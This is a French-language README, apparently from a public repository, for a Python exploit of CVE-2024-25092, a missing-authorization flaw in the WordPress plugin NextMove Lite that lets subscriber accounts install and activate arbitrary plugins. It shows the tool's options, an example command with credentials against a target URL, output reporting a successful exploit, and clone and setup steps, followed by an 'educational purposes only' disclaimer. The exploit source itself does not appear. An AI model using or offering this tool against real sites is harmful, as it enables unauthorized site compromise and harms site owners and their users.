
Plugin WordPress NextMove Lite <= 2.17.0 - Vulnérabilité d'Installation/Activation arbitraire de plugin Subscriber+
CVE-2024-25092 est une vulnérabilité de haute sévérité affectant le plugin WordPress NextMove Lite (versions <= 2.17.0). Cette vulnérabilité permet à un utilisateur de niveau abonné ou supérieur d'installer et d'activer des plugins arbitraires sur un site WordPress en raison de l'absence de contrôles d'autorisation.
Le plugin XLPlugins NextMove Lite pour WordPress présente une vulnérabilité d'autorisation manquante, permettant aux utilisateurs authentifiés ayant des autorisations de niveau abonné ou supérieur d'effectuer des installations et activations arbitraires de plugins. Cela peut conduire à un compromis total du site WordPress.
Le script Python fourni automatise l'exploitation de cette vulnérabilité en se connectant au site WordPress et en installant un plugin spécifié.
usage: CVE-2024-25092.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-un USERNAME, --username USERNAME
Username
-p PASSWORD, --password PASSWORD
Password
-pl PLUGIN, --plugin PLUGIN
Plugin to install (default: cart-for-woocommerce)
python CVE-2024-25092.py -u http://example.com -un admin -p password -pl custom-plugin
Logged in successfully.
Site is vulnerable... Exploiting and uploading plugin
Plugin 'cart-for-woocommerce' installed and activated successfully.
requestsClonez le dépôt :
git clone https://github.com/Nxploited/CVE-2024-25092.git
cd CVE-2024-25092
Installez les paquets Python requis :
pip install requests
Ce script est destiné uniquement à des fins éducatives. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation explicite. Toute utilisation non autorisée de ce script est illégale et contraire à l'éthique.